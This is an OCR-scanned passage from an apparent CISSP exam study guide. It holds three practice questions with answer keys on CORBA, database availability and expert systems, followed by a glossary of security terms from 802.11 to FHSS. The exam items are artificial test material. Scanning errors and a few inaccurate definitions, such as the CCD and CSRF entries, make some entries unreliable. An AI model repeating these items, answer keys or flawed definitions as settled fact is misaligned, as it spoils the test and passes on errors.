a front-end Web server. 

1 3. What language allows CORBA (Common Object Request Broker Architecture) 

objects to communicate via a message interface? 

A. Distributed Component Object Model (DCOM) 

B. Interface Definition Language (IDL) 

C. Object Linking and Embedding (OLE) 

D. Object Management Guidelines (OMG) 

Correct Answer and Explanation: B. Answer B is correct; Interface Definition 
Language (IDL) allows CORBA objects to communicate via a message interface. 
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Incorrect Answers and Explanations: A, C, and D. Answers A, C, and D are 
incorrect. DCOM (Distributed Component Object Model) is a Microsoft object bro- 
ker that locates objects over a network. Object Linking and Embedding (OLE), is a 
part of DCOM that provides a way to link documents to other documents. Object 
Management Guidelines is a distracter answer, playing off the ream OMG: Object 
Management Group (OMG) developed CORBA. 

1 4. What database high availability option allows multiple clients to access 

multiple database servers simultaneously? 

A. Database commit 

B . Database j ournal 

C. Replicated database 

D. Shadow database 

Correct Answer and Explanation: C. Answer C is correct; Database replication 
mirrors a live database, allowing simultaneous reads and writes to multiple repli- 
cated databases by clients. 

Incorrect Answers and Explanations: A, B, and D. Answers A , B. and D are 
incorrect. DBMSs may attempt to commit updates: make the pending changes per- 
manent. A database journal is a log of all database transactions. A shadow database is 
similar to a replicated database, with one key difference: a shadow database mirrors 
all changes made to a primary database, but clients do not access the shadow. 

1 5. What component of an expert system consists of “if/then” statements? 

A. Backward chaining 

B. Forward chaining 

C. Inference engine 

D. Knowledge base 

Correct Answer and Explanation: D. Answer D is correct; a knowledge base con- 
sists of “if/then” statements. These statements contain rules that the expert system 
uses to make decisions. 

Incorrect Answers and Explanations: A, B. and C. Answers A, B, and C are 
incorrect. Forward chaining starts with no premise and works forward to deter- 
mine a solution. Backward chaining begins with a premise and works backwards. 
The inference engine follows the tree formed by knowledge base, and fires a rule 
when there is a match. 
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This glossary is organized by acronym: for example the “Data Encryption Standard” 
entry says “See — DES.” The “DES” entry contains the definition. This is done because 
it is the logical approach for a technical book, and allows faster lookups of definitions. 

The second reason is to encourage you to learn the mapping of acronyms to terms 
(and vice-versa). Formal phrases in the Common Body of Knowledge can provide 
a shortcut to cutting through the clutter in an exam question. Knowing the formal 
acronyms can provide the fastest roadmap to identifying the crux of a question. 

You should understand every term defined in this glossary before taking your 
exam. A read through of the glossary is a good final exam prep step, as discussed in 
the “How to Prepare for the Exam” section of the introduction. 

802.11 Wireless networking standard 

* Integrity axiom Biba property which states “no write up” 

* Security property Bell-LaPadula property that states “no write down” 

“Bad” blocks/clusters/sectors Good disk blocks marked as bad 

4GL Fourth-generation programming language, designed to increase programmer’s effi- 
ciency by automating the creation of computer programming code 
802.11-1997 The original mode of 802.11, operated at 2 mbps using the 2.4 GHz frequency 
802.11a 802. 1 1 mode that operates at 54 mbps using the 5 GHz frequency 
802.11b 802. 1 1 mode that operates at 1 1 mbps using the 2.4 GHz frequency 
802.11g 802. 1 1 mode that operates at 54 mbps using the 2.4 GHz frequency 
802.11i The first 802.1 1 wireless security standard that provides reasonable security 
802.11n 802.11 mode that uses both 2.4 and 5 GHz frequencies and allows speeds of 
144 mbps and beyond 

802.1X Port-based Network Access Control, layer 2 authentication 

ABM Asynchronous Balanced Mode, HDLC combined mode where nodes may act as 
primary or secondary, initiating transmissions without receiving permission 
Abstraction Hides unnecessary details from the user 

Acceptance Testing Testing to ensure the software meets the customer’s operational 
requirements 

Access aggregation The collective entitlements granted by multiple systems to one user. Can 
lead to authorization creep 
Access Control List See — ACL 

Access control matrix Table defining what access permissions exist between specific sub- 
jects and objects 

Account lockout Disables an account after a set number of failed logins, sometimes during 
a specific time period 

Accountability Holds individuals accountable for their actions 

Accountability Principle OECD Privacy Guideline principle which states individuals should 
have the right to challenge the content of any personal data being held, and have a process 
for updating their personal data if found to be inaccurate or incomplete 
Accreditation The Data Owner’s acceptance of the risk represented by a system 
ACK TCP flag, acknowledge received data 
ACL Access control lists 
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Act honorably, honestly, justly, responsibly, and legally Second canon of the (ISC) 2 ® Code 
of Ethics 

Active RFID Powered RFID tags that can operate via larger distances 
Active-active cluster Involves multiple systems all of which are online and actively process- 
ing traffic or data 

Active-passive cluster Involves devices or systems that are already in place, configured, 
powered on and ready to begin processing network traffic should a failure occur on the 
primary system 

ActiveX controls The functional equivalent of lava applets. They use digital certificates 
instead of a sandbox to provide security 
Ad hoc mode 802.1 1 peer-to-peer mode with no central AP 
Address Space Layout Randomization See — ASLR 

Administrative controls Implemented by creating and following organizational policy, 
procedure, or regulation. Also called directive controls 
Administrative law Law enacted by government agencies, aka regulatory law 
ADSL Asymmetric Digital Subscriber Line, DSL featuring faster download speeds than upload 
Advance and protect the profession Fourth canon of the (ISC) 2 ® Code of Ethics 
Advanced Encryption Standard See — AES 

AES Advanced Encryption Standard, a block cipher using 128 bit, 192 bit, or 256 bit keys to 
encrypt 128-bit blocks of data 

Agents of law enforcement Private citizens carrying out actions on behalf of law enforcement 
Aggregation Mathematical attack where a user is able to use lower-level access to learn 
restricted information 

Agile Software Development Flexible software development model that evolved as a 
reaction to rigid software development models such as the Waterfall Model 
AH Authentication Header, IPsec protocol that provides authentication and integrity for each 
packet of network data 

ALE Annualized Loss Expectancy, the cost of loss due to a risk over a year 
All pairs testing See — Pairwise testing 

Allocated space Portions of a disk partition that are marked as actively containing data 
ALU Arithmetic Logic Unit, CPU component that performs mathematical calculations 
Analog Communication that sends a continuous wave of information 
ANN Artificial Neural Networks, simulate neural networks found in humans and animals 

Annual Rate of Occurrence See — ARO 
Annualized Loss Expectancy See — ALE 

Antivirus software Software is designed to prevent and detect malware infections 
API Application Programming Interface, allows an application to communicate with an 
another application, or an operating system, database, network, etc. For example, the 
Google Maps API allows an application to integrate 3rd-party content, such as restaurants 
overlaid on a Google Map 

Applet Small pieces of mobile code that are embedded in other software such as web browsers 
Application layer (OSI) Layer 7 of the OSI model, where the user interfaces with the 
computer application 

Application layer (TCP/IP) TCP/IP model layer that combines Layers 5 though 7 of the 
OSI model 

Application-layer proxy Proxy firewall that operates up to Layer 7 

Application Programming Interface See — API 

ARCNET Attached Resource Computer Network, a legacy LAN technology that uses tokens 

Arithmetic Logic Unit See — ALU 
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ARM Asynchronous Response Mode, HDLC mode where secondary nodes may initiate 
communication with the primary 

ARO Annual Rate of Occurrence, the number of losses suffered per year 
ARPAnet The predecessor of the Internet 

Artificial Intelligence The science of programming electronic computers to “think" more 
intelligently, sometimes mimicking the ability of mammal brains 
Artificial Neural Networks See — ANN 

ASLR Address Space Location Randomization, seeks to decrease the likelihood of success- 
ful exploitation by making memory addresses employed by the system less predictable 
Assembly language Low-level computer programming language with instructions that are 
short mnemonics, such as “ADD,”“SUB” (subtract) and “JMP" (jump), that match to 
machine language instructions 

Asset A resource that is valuable to an organization and must be protected 
Asset Value See — AV 

Asymmetric Digital Subscriber Line See — ADSL 

Asymmetric Encryption Encryption that uses two keys: if you encrypt with one you may 
decrypt with the other 

Asynchronous Balanced Mode See — ABM 

Asynchronous Dynamic Token Authentication token that is not synchronized with a central 
server; includes challenge-response tokens 
Asynchronous Response Mode See — ARM 
Asynchronous Transfer Mode See — ATM 

ATA Secure Erase Hardware-level secure erase command available on Solid State Drives 
(SSDs) that erases all blocks and also generates a new encryption key 
ATM Asynchronous Transfer Mode, a WAN technology that uses fixed length cells 
Attribute A column in a relational database table 
Authentication Proof of an identity claim 
Authentication Header See — AH 

Authorization Actions an individual can perform on a system 

Authorization creep Occurs when employees not only maintain old access rights but also 
gain new ones as they move from one division to another within an organization 
AV Asset Value, the value of a protected asset 
Availability Assures information is available when needed 
Awareness Security control designed to change user behavior 
Backdoor A shortcut in a system that allows a user to bypass security checks 
Background checks Verification of a person’s background and experience, also called a pre- 
employment screening 

Backward chaining Expert system mode that starts with begins with a premise, and works 
backwards 

Baseband Network with one channel; can only send one signal at a time 
Baseline Uniform ways to implement a safeguard, administrative control 
Baselining The process of capturing a point in time understanding of the current system 
security configuration 

Basic Input Output System See — BIOS 
Basic Rate Interface See — BRI 

Bastion host Any host placed on the Internet that is not protected by another device 
Bayesian filtering Uses mathematical formulas to assign probabilities to make decisions 
such as identifying spam 
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BCI The Business Continuity Institute 

BCP Business Continuity Plan, A long-term plan to ensure the continuity of business 
operations 

BCP/DRP project manager The key point of contact for ensuring that a BCP/DRP is not 
only completed, but also routinely tested 

Bell-LaPadula Security model focused on maintaining the confidentiality of objects 
Best evidence rule Requires use of the strongest possible evidence 

Best practice A consensus of the best way to protect the confidentiality, integrity and 
availability of assets 

BGP Border Gateway Protocol, the routing protocol used on the Internet 

Biba Security model focused on maintaining the integrity of objects 

Big Bang testing Integration testing that tests all integrated software components 

Binary image Bit-level copy of memory 

BIOS Basic Input Output System, typically stored in firmware 

Black box software testing Gives the tester no internal details: the software is treated as a 
black box that receives inputs 
Black hat Unethical hacker or researcher 

Blowfish Block cipher using from 32 through 448 bit (the default is 128) keys to encrypt 64 
bits of data 

Bluetooth 802.15 networking, a PAN wireless technology 

Bollard A post designed to stop a car, typically deployed in front of building entrances 
Book cipher Cryptographic method that uses whole words from a well-known text such as a 
dictionary as a one-to-one replacement for plaintext 
Boot sector virus Virus that infects the boot sector of a PC, which ensures the virus loads 
upon system startup 

BOOTP Bootstrap Protocol, used for bootstrapping via a network by diskless systems 

Bootstrap Protocol See — BOOTP 
Border Gateway Protocol See — BGP 

Bot A computer system running malware that is controlled via a botnet 
Botnet A central bot command and control (C&C) network, managed by humans called bot 
herders 

Bottom-Up programming Starts with the low-level technical implementation details and 
works up to the concept of the complete program 
Breach notification Notification of persons whose personal data has been, or is likely to have 
been, compromised 

Brewer-Nash See — Chinese Wall Model 

BRI Basic Rate Interface, provides two 64 K digital ISDN channels 
Bridge Layer 2 device that has two ports and connects network segments together 
Broadband Network with multiple channels; can send multiple signals at a time, like cable 
TV 

Broadcast Traffic that is sent to all stations on a LAN 

BRP Business Recovery Plan, details the steps required to restore normal business operations 
after a recovering from a disruptive event. Also known as the Business Resumption Plan 
Brute force attack Attack that attempts every possible key or combination 
BS-25999 Continuity standard by the British Standards Institution (BSI) 

Buffer overflow Condition where an attacker can insert data beyond the end of a buffer 
variable 

Bus Physical network topology that connects network nodes in a string 
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Business Continuity Plan See — BCP 

Business interruption testing Partial or complete failover to an alternate site 
Business Owners Also called Mission Owners, members of senior management who create 
the information security program and ensure that it is properly staffed, funded, and has 
organizational priority 
Business Recovery Plan See — BRP 
Business Resumption Plan See — BRP 

Bytecode Machine-independent interpreted code, used by Java 
Cable modem Provide Internet access via broadband cable TV 

Cache memory The fastest memory on the system, required to keep up with the CPU as it 
fetches and executes instructions 
Caesar Cipher A rot-3 substitution cipher 
Callback Modem-based authentication system 

Caller ID Identifies the calling phone number, sometimes used as a weak authentication 
method 

Candidate keys Any attribute (column) in the table with unique values 
Capability Maturity Model See — CMM 
Carrier Sense Multiple Access See — CSMA 

CASE Computer-Aided Software Engineering, uses programs to create assist in the creation 
and maintenance of other computer programs 

CBC Cipher Block Chaining, a block mode of DES that XORs the previous encrypted block 
of ciphertext to the next block of plaintext to be encrypted 
CCD Charged Couple Discharge, a digital CCTV 

CCMP Counter Mode CBC MAC Protocol, used by WPA2 to create a MIC 
CCTV Closed Circuit Television, a detective device used to aid guards in detecting the pres- 
ence of intruders in restricted areas 

CDN Content Distribution Networks (also Content Delivery Networks) use a series of 
distributed caching servers to improve performance and lower the latency of downloaded 
online content 

Central Processing Unit See — CPU 

Centralized access control Concentrates access control in one logical point for a system or 
organization 

CER Crossover Error Rate, describes the point where the False Reject Rate (FRR) and False 
Accept Rate (FAR) are equal 

Certificate Authority PKI component that authenticates the identity of a person or organiza- 
tion before issuing a certificate to them 
Certificate Revocation List See — CRL 

Certification A detailed inspection that verifies whether a system meets the documented 
security requirements 

CFB Cipher Feedback, a stream mode DES that is similar to block-mode CBC 
Chain of custody Requires that once evidence is acquired, full documentation regarding 
who, what, when, and where evidence was handled is maintained 
Chaining Block cipher mechanism that seeds the previous encrypted block into the next 
block to be encrypted 

Challenge Handshake Authentication Protocol See — CHAP 

Change management The process of understanding, communicating, and documenting 
changes 

Channel Service Unit/Data Service Unit See — CSU/DSU 
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CHAP Challenge Handshake Authentication Protocol, a more secure network authentication 
protocol that uses a shared secret 

Charged Couple Discharge See — CCD 

Checklist testing Lists all necessary components required for successful recovery, and 
ensures that they are, or will be, readily available should a disaster occur. Also known as 
consistency testing 

Chinese Wall Model Model designed to avoid conflicts of interest by prohibiting one person, 
like a consultant, from accessing multiple conflict of interest categories (Cols) 

CIA triad Confidentiality, Integrity, and Availability 

CIDR Classless Inter-Domain Routing, allows for many network sizes beyond the arbitrary 
stateful network sizes 
Cipher A cryptographic algorithm 

Cipher Block Chaining See — CBC 

Cipher disk Cryptographic device that uses two concentric disks, each with an alphabet 
around the periphery 
Cipher Feedback See — CFB 
Ciphertext An encrypted message 

Circuit-level proxy Proxy firewall that operates at Layer 5 

Circuit-switched network Network that provides a dedicated circuit or channel between two 
nodes 

Circumstantial evidence Evidence that serves to establish the circumstances related to 
particular points or even other evidence 

CIRT Computer Incident Response Team, a team that performs incident handling 
CISC Complex Instruction Set Computer, CPU instructions that are longer and more 
powerful 

Civil law Law that resolves disputes between individuals or organizations 
Civil law (legal system) Legal system that leverages codified laws or statutes to determine 
what is considered within the bounds of law 

Clark- Wilson Real-world integrity model that protects integrity by having subjects access 
objects via programs 

Class I gate Residential gate designed for home use 

Class II gate Commercial gate, such as a parking garage gate 

Class III gate Industrial/limited access gate, such as a large loading dock 

Class IV gate Restricted Access gate, used at an airport or prison 

Classful addresses IPv4 networks in classes A through E 

Classless Inter-Domain Routing See — CIDR 

Clearance A determination, typically made by a senior security professional, about whether 
or not a user can be trusted with a specific level of information 
Client-side attacks Attack where a user downloads malicious content 
Clipper Chip (Failed) 1993 Escrowed Encryption Standard (EES), which used the Skipjack 
algorithm 

Clipping level A minimum reporting threshold level 
Closed Circuit Television See — CCTV 

Closed source Software released in executable form: the source code is kept confidential 
Closed system System using proprietary hardware or software 

CMM Capability Maturity Model, a maturity framework for evaluating and improving the 
software development process 
CMP Crisis Management Plan 
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Coaxial Network cabling that has an inner copper core separated by an insulator from a 
metallic braid or shield 

COBIT Control Objectives for Information and related Technology, a control framework for 
employing information security governance best practices within an organization 
COCOM Committee for Multilateral Export Controls, a munitions law which was in effect 
from 1947 to 1994. It was designed to control the export of critical technologies (including 
cryptography) to “Iron Curtain” countries during the cold war 
Code Repositories Secure service for storing source code of projects, a public example is 
GitHub 

Codebreakers (The) David Kahn’s history of cryptography 

Cohesion OOP concept that describes an independent object. Objects with high cohesion 
have low coupling 

Cold site A backup site with raised floor, power, utilities, and physical security, and no con- 
figured systems or data 

Collection Limitation Principle OECD Privacy Guideline principle which states per- 
sonal data collection should have limits, be obtained in a lawful manner, and, unless 
there is a compelling reason to the contrary, with the individuals knowledge and 
approval 

Collision Two or more plaintexts that generate the same hash 

Collusion An agreement between two or more individuals to subvert the security of a system 
Color of law Acting on the authority of law enforcement 
COM Component Object Model, locates, and connects objects locally 
Combinatorial software testing Black box testing method that seeks to identify and test all 
unique combinations of software inputs 

Commandments of Computer Ethics The Computer Ethics Institute code of ethics 
Commit Makes changes to a database permanent 

Common Criteria An internationally agreed upon standard for describing and testing the 
security of IT products 

Common law Legal system that places significant emphasis on particular cases and judicial 
precedent as a determinant of laws 

Common Object Request Broker Architecture See — CORBA 
Compartmentalization Technical enforcement of need to know 

Compensating controls Additional security controls put in place to compensate for weak- 
nesses in other controls 

Compensatory damages Damages provides as compensation 

Compiler Convert source code, such as C or Basic, and compile it into machine code 

Complex Instruction Set Computer See — CISC 
Component Object Model See — COM 

Computer bus The primary communication channel on a computer system 
Computer crimes Crimes using computers 

Computer Fraud and Abuse Act Title 18 United States Code Section 1030 
Computer Incident Response Team See — CIRT 
Computer Security Incident Response Team See — CSIRT 
Computer-Aided Software Engineering See — CASE 
Commercial Off-the-Shelf Software See — COTS 

Conduct the business impact analysis (BIA) Second step of the NIST SP 800-34 contingency 
planning process 

Confidentiality Seeks to prevent the unauthorized disclosure of information 
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Configuration management The process of developing a consistent system security con- 
figuration that can be leveraged throughout an organization 
Confusion The relationship between the plaintext and ciphertext should be as confused (or 
random) as possible 

Consistency testing See — Checklist testing 

Constrained user interface Presents a user with limited controls on information, such as an 
ATM keypad 

Containment phase Incident response phase that attempts to keep further damage from 
occurring as a result of the incident 

Content-dependent access control Adds additional criteria beyond identification and 
authentication: the actual content the subject is attempting to access 

Content Distribution Networks See — CDN 

Context-dependent access control Adds additional criteria beyond identification and 
authentication: the context of the access, such as time 

Continuity of Operations Plan See — COOP 

Continuity of Support Plan Focuses narrowly on support of specific IT systems and 
applications 

Continuity Planning Project Team See — CPPT 

Contraband check Seek to identify objects that are prohibited to enter a secure perimeter 
(such as an airplane) 

Control Objectives for Information and related Technology See — COBIT 
Control unit CPU component that acts as a traffic cop, sending instructions to the ALU 
Convergence All routers on a network agree on the state of routing 
COOP Continuity of Operations Plan, a plan to maintain operations during a disaster 
Copyright Type of intellectual property that protects the form of expression in artistic, musi- 
cal, or literary works 

CORBA Common Object Request Broker Architecture, an open vendor-neutral networked 
object broker framework 

Corrective controls Controls that correct a damaged system or process 
Corroborative evidence Evidence that provides additional support for a fact that might have 
been called into question 

COTS Commercial Off-the-Shelf Software, third-party developed commercial software 
available to the general public 
Counter Mode See — CTR 
Counter Mode CBC MAC Protocol See— CCMP 

Coupling OOP concept that connects objects to others. Highly coupled objects have low 
cohesion 

Covert channel Any communication that violates security policy 

CPPT Continuity Planning Project Team, a team comprised of stakeholders within an orga- 
nization and focuses on identifying who would need to play a role if a specific emergency 
event were to occur 

CPU Central Processing Unit, the “brains” of the computer, capable of controlling and per- 
forming mathematical calculations 
Cracker A black hat hacker 

Criminal law Law where the victim can be seen as society itself 

Crippleware Partially functioning proprietary software, often with key features disabled. 

The user is typically required to make a payment to unlock the full functionality 
Crisis Management Plan See — CMP 
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CRL Certificate Revocation Lists, PKI component which lists digital certificates that have 
been revoked 

Crossover Genetic algorithm concept that combines two algorithms 
Crossover Error Rate See — CER 
Cross-Site Request Forgery See — CSRF 
Cross-Site Scripting See — XSS 

Cryptanalysis The science of breaking encrypted messages (recovering their meaning) 
Cryptographic Protocol Governance Describes the process of selecting the right cipher and 
implementation for the right job 

Cryptography Science of creating messages whose meaning is hidden 
Cryptology The science of secure communications 

CSIRT Computer Security Incident Response Team, the group that is tasked with monitor- 
ing, identifying, and responding to security incidents 
CSMA Carrier Sense Multiple Access, a method used by Ethernet networks to allowed shared 
usage of a baseband network, and avoid collisions 
CSRF Cross-Site Request Forgery, third-party redirect of static content within the security 
context of a trusted site 

CSU/DSU Channel Service Unit/Data Service Unit, DCE device 
CTR Counter, a stream mode of DES that uses a counter for feedback 
Custodian Provides hands-on protection of assets 

Customary Law Customs or practices that are so commonly accepted by a group that the 
custom is treated as a law 

CWR New TCP flag, Congestion Window Reduced 

Cyber Incident Response Plan Plan designed to respond to disruptive cyber events, includ- 
ing network-based attacks, worms, computer viruses, Trojan horses, etc 
Cybersquatting Registering Internet domain names associated with another organization’s 
intellectual property 

DAC Discretionary Access Control, gives subjects full control of objects they have or been 
given access to, including sharing the objects with other subjects 
DAD Disclosure, Alteration, and Destruction, the opposite of Confidentiality, Integrity, and 
Availability 

DARPA Defense Advanced Research Projects Agency, funders of the original MILNET and 
ARPANET 

Data controllers Role that creates and manages sensitive data within an organization. Human 
resources employees are an example: they create and manage sensitive data, such as salary 
and benefit data, reports from employee sanctions, etc 

Data Circuit-Terminating Equipment See — DCE 
Data Definition Language See — DDL 

Data dictionary Contains a description of the database tables, including the schema, data- 
base view information, and information about authorized database administrator and user 
accounts 

Data Encryption Algorithm See — DEA 
Data Encryption Standard See — DES 
Data Execution Prevention See — DEP 

Data hiding See — Encapsulation (object) 

Data link layer Layer 2 of the OSI model, handles access to the physical layer as well as local 
area network communication 
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Data Manipulation Language See — DML 

Data mining Used to search for patterns, such as fraudulent activity, in a data warehouse 
Data Owner A management employee responsible for assuring that specific data is protected 
Data processor Role that manages data on behalf of data controllers. An outsourced payroll 
company is an example of a data processor 

Data Quality Principle OECD Privacy Guideline principle that states personal data should 
be complete, accurate, and maintained in a fashion consistent with the purposes for the 
data collection 

Data remanence See — Remanence 
Data Terminal Equipment See — DTE 
Data warehouse A large collection of data 
Database A structured collection of related data 
Database Administrators See — DBA 

Database journal A log of all database transactions. Should a database become corrupted, 
the database can be reverted to a backup copy, and then subsequent transactions can be 
“replayed” from the journal, restoring database integrity 
Database Management System See — DBMS 

Database replication Mirrors a live database, allowing simultaneous reads and writes to mul- 
tiple replicated databases by clients 

Database shadowing Two or more identical databases that are updated simultaneously 

Database view The result of a database query 

DBA Database Administrators, role that manages databases 

DBMS Database Management System, controls all access to the database and enforces 
database security 

DCE Data Circuit-Terminating Equipment, a device that networks DTEs, such as a router 
DCOM Distributed Component Object Model, locates, and connects objects across a network 
DDL Data Definition Language, used to create, modify, and delete tables 
DDoS Distributed Denial of Service, an availability attack using many systems 
DEA Data Encryption Algorithm, described by DES 

Deadbolt A rigid locking mechanism that is held in place by a key, and prevents the door 
from opening or fully closing when extended 
Decryption Converts a ciphertext into plaintext 

Defense-in-depth Application of multiple safeguards that span multiple domains to protect 
an asset 

Defined CMM phase 3 

Degaussing Destroying the integrity of the magnetization of the storage media, making the 
data unrecoverable 

Demarc Demarcation point, where the ISP’s responsibility ends, and the customer’s begins 

Demilitarized Zone See — DMZ 
Denial of Service See — DoS 

DEP Data Execution Prevention, which can be enabled within hardware and/or software, and 
makes specific pages of the stack non-executable 
Depth of Held The area that is in focus 

DES Data Encryption Standard, a symmetric block cipher using a 56-bit key and 64-bit block 
size 

Detection phase Incident response phase that analyzes events in order to determine whether 
they might comprise a security incident 
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Detective controls Controls that alert during or after a successful attack 
Deterrent controls Deter users from performing actions on a system 
Develop an IT contingency plan Fifth step of the NIST SP 800-34 contingency planning 
process 

Develop recovery strategies Fourth step of the NIST SP 800-34 contingency planning 
process 

Develop the contingency planning policy statement First step of the NIST SP 800-34 con- 
tingency planning process 

DevOps A more agile development and support model, echoing agile programming methods 
including Sashimi and Scrum. Developers directly support operational functions 
DHCP Dynamic Host Configuration Protocol, assigns temporary IP address leases to sys- 
tems, as well as DNS and default gateway configuration 
Diameter RADIUS’ successor, designed to provide an improved Authentication, 
Authorization, and Accounting (AAA) framework 
Dictionary attack Password cracking method that uses a predefined list of words, like a dic- 
tionary, running each word through a hash algorithm 
Differential backup An archive of any files that have been changed since the last full backup 
was performed 

Differential cryptanalysis Seeks to find the “difference” between related plaintexts that are 
encrypted 

Diffie-Hellman Key Agreement Protocol Key agreement allows two parties to securely 
agree on a symmetric key via a public channel with no prior key exchange 
Diffusion The order of the plaintext should be dispersed in the ciphertext 
Digital Communication that transfers data in bits: ones and zeroes 

Digital signature Provides nonrepudiation, which includes authentication of the identity of 
the signer, and proof of the document’s integrity 

Digital Subscriber Line See — DSL 

Direct evidence Testimony provided by a witness regarding what the witness actually expe- 
rienced 

Direct Sequence Spread Spectrum See — DSSS 

Directory Path Traversal Escaping from the root of a web server (such as /var/www) into the 
regular file system by referencing directories such as 
Disassembler Attempts to convert machine language into assembly 
Disaster Any disruptive event that interrupts normal system, operations 
Disaster Recovery Plan See — DRP 
Disclosure, Alteration and Destruction See — DAD 
Discretionary Access Control See — DAC 

Diskless workstation Computer systems that contains CPU, memory and firmware, but no 
hard drive, type of thin client 

Distance vector Routing protocol that uses a simple metric, such as hop count 

Distributed Component Object Model See — DCOM 
Distributed Denial of Service See — DDoS 
Distributed Network Protocol See — DPN3 

Divestitures Also known as de-mergers and de-acquisitions, and represent the flip side of 
acquisitions: one company becomes two or more 
DML Data Manipulation Language, used to query and update data stored in the tables 
DMZ Demilitarized Zone network, used to separate trusted from untrusted networks 
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DNP3 Distributed Network Protocol, provides an open standard used primarily within the 
energy sector for interoperability between various vendors’ SCADA and smart grid appli- 
cations 

DNS Domain Name System, a distributed global hierarchical database that translates names 
to IP addresses, and vice versa 

DNS reflection attack Spoofed DoS attack using third-party DNS servers 
DNSSEC Domain Name Server Security Extensions, provides authentication and integrity to 
DNS responses via the use of public key encryption 

Domain Name Server Security Extensions See — DNSSEC 
Domain Name System See — DNS 

Domains of trust Access control model used by Windows Active Directory 
DoS Denial of Service, an attack on availability 

DRAM Dynamic Random Access Memory, stores bits in small capacitors (like small 
batteries), cheaper, and slower than SRAM 
DRP Disaster Recovery Plan, a short-term plan to recover from a disruptive event 
DSL Digital Subscriber Line, uses existing copper pairs to provide digital service to homes 
and small offices 

DSSS Direct Sequence Spread Spectrum, uses the entire wireless band at once 
DTE Data Terminal Equipment, a network “terminal,” such as a desktop, server, or actual 
terminal 

DTE/DCE Connection that spans the demarc 
Dual-factor authentication See — Strong authentication 

Dual-homed host Host with two network interfaces: one connected to a trusted network, and 
the other connected to an untrusted network 

Due care Requires that key organizational stakeholders are prudent in carrying out their 
duties, aka the “prudent man rule.” 

Due diligence The management of due care 

Dumpster diving A physical attack in which a person recovers trash in hopes of finding 
sensitive information that has been merely discarded in whole rather than being destroyed 

Dynamic Host Configuration Protocol See — DHCP 
Dynamic password Changes at regular intervals 

Dynamic signatures Biometric control that measures the process by which someone signs 
their name 

Dynamic testing Tests code while executing it 
El Dedicated 2.048 megabit circuit that carries 30 channels 
E3 24 Els 

EAP Extensible Authentication Protocol, a layer 2 authentication framework that describes 
many specific authentication protocols 

EAP-FAST EAP-Flexible Authentication via Secure Tunneling, designed by Cisco to replace 
LEAP 

EAP Over LAN See— EAPOL 

EAP-Transport Layer Security See — EAP-TLS 

EAP Tunneled Transport Layer Security See — EAP-TTLS 

EAP-TLS EAP — Transport Layer Security, uses PKI, requiring both server-side and client- 
side certificates 

EAP-TTLS EAP Tunneled Transport Layer Security, simplifies EAP-TLS by dropping the 
client-side certificate requirement 
EAPOL EAP Over LAN, a layer 2 protocol for varying EAP 
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ECB Electronic Code Book mode, the simplest and weakest mode of DES 
ECE New TCP flag, Explicit Congestion Notification Echo 

ECPA Electronic Communications Privacy Act, provides search and seizure protection to 
non-telephony electronic communications 

eDiscovery Electronic Discovery, pertains to legal counsel gaining access to pertinent ESI 
(Electronic Stored Information) during the pre-trial discovery phase of civil legal proceed- 
ings 

EEPROM Electrically-Erasable Programmable Read Only Memory, electrically erasable 
memory via the use of flashing program 
EF Exposure Factor, the percentage of value an asset lost due to an incident 
EGP Exterior Gateway Protocol 

Electrically-Erasable Programmable Read Only Memory See — EEPROM 
Electronic backups Data that is stored electronically and can be retrieved in case of disrup- 
tive event or disaster 
Electronic Code Book See — ECB 
Electronic Communications Privacy Act See — ECPA 
Electronic Discovery See — eDiscovery 

Electronic vaulting Batch process of electronically transmitting data that is to be backed up 
on a routine, regularly scheduled time interval 

Emanations Energy which escape an electronic system, and which may be remotely moni- 
tored under certain circumstances 

Emergency Operations Center See — EOC 
Encapsulating Security Payload See — ESP 

Encapsulation (network) Takes information from a higher network layer and adds a header 
to it, treating the higher-layer information as data 
Encapsulation (object) Contains and hides the details of an object’s method 
Encryption Converts the plaintext to a ciphertext 
End-User License Agreement See — EULA 

Enigma Rotor machine used by German Axis powers during World war II 
Enrollment The process of enrolling with a system (such as a biometric authentication sys- 
tem), creating an account for the first time 

Enticement Making the conditions for commission of a crime favorable for those already 
intent on breaking the law 
Entitlements The permissions granted to a user 

Entity integrity Requires that each tuple has a unique primary key that is not null 
Entrapment A legal defense where the defendant claims an agent of law enforcement 
persuaded the defendant to commit a crime that he or she would otherwise not have 
committed 

EOC Emergency Operations Center, the command post established during or just after an 
emergency event 

Ephemeral ports TCP/IP ports 1024 and higher 

EPROM Erasable Programmable Read Only Memory, memory which may be erased with 
ultraviolet light 

Eradication phase Incident response phase that cleans a compromised system 

Erasable Programmable Read Only Memory See — EPROM 

ESP Encapsulating Security Payload, IPsec protocol which Payload primarily provides con- 
fidentiality by encrypting packet data 

Ethernet Dominant local area networking technology that transmits network data via frames 
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Ethics Doing what is morally right 

EU Data Protection Directive Privacy directive which allows for the free flow of informa- 
tion while still maintaining consistent protections of each member nation’s citizen’s data 
EULA End-User License Agreement, a form of software licensing agreement 
Exclusive Or See — XOR 

Executive Succession Planning Determines an organization’s line of succession 
Exfiltration Policy-violating removal of sensitive data from a secure perimeter 
Exigent circumstances With respect to evidence acquisition, justification for the seizure 
of evidence without a warrant due to the extreme likelihood that the evidence will be 
destroyed 

Expert systems Seeks to replicate the knowledge and decision-making capability of human 
experts 

Exposure Factor See — EF 
Extensible Authentication Protocol See — EAP 
Extensible Markup Language See — XML 
Exterior Gateway Protocol See — EGP 
Extranet A connection between private Intranets 
Extreme Programming See — XP 

Facial scan Biometric control takes compares a picture of a face to pictures stored in a database 
Failover cluster See — High availability cluster 

Fair use doctrine Allows someone to duplicate copyrighted material without requiring the 
payment, consent, or even knowledge of the copyright holder 
False Accept Rate See — FAR 
False Reject Rate See — FRR 

FAR False Accept Rate, occurs when an unauthorized subject is accepted as valid. Also 
known as a type II error 

Faraday Cage Shields enclosed objects from EMI 

FCoE Fibre Channel over Ethernet, Storage Area Network (SAN) protocol that leverages Fibre 
Channel, but can be transmitted across standard Ethernet networks. Does not use TCP/IP 
FCIP Fibre Channel over IP, Storage Area Network (SAN) protocol that encapsulates Fibre 
Channel frames via Ethernet and TCP/IP 
FDDI Fiber Distributed Data Interface, legacy LAB technology that uses light 
FDE Full Disk Encryption, also called Whole Disk Encryption 
FDX See — Fetch and execute 
Federated Identity Management See — FIdM 

Feedback Stream cipher mechanism that seeds the previous encrypted bit into the next bit to 
be encrypted 

Fetch and execute Mechanism that allows the CPU to receive machine language instructions 
and execute them. Also called “Fetch, Decode, Execute,” or FDX 
FHSS Frequency Hopping Spread Spectrum, uses a number of small frequency channels 
throughout the wireless band and “hops” through them in pseudorandom order 
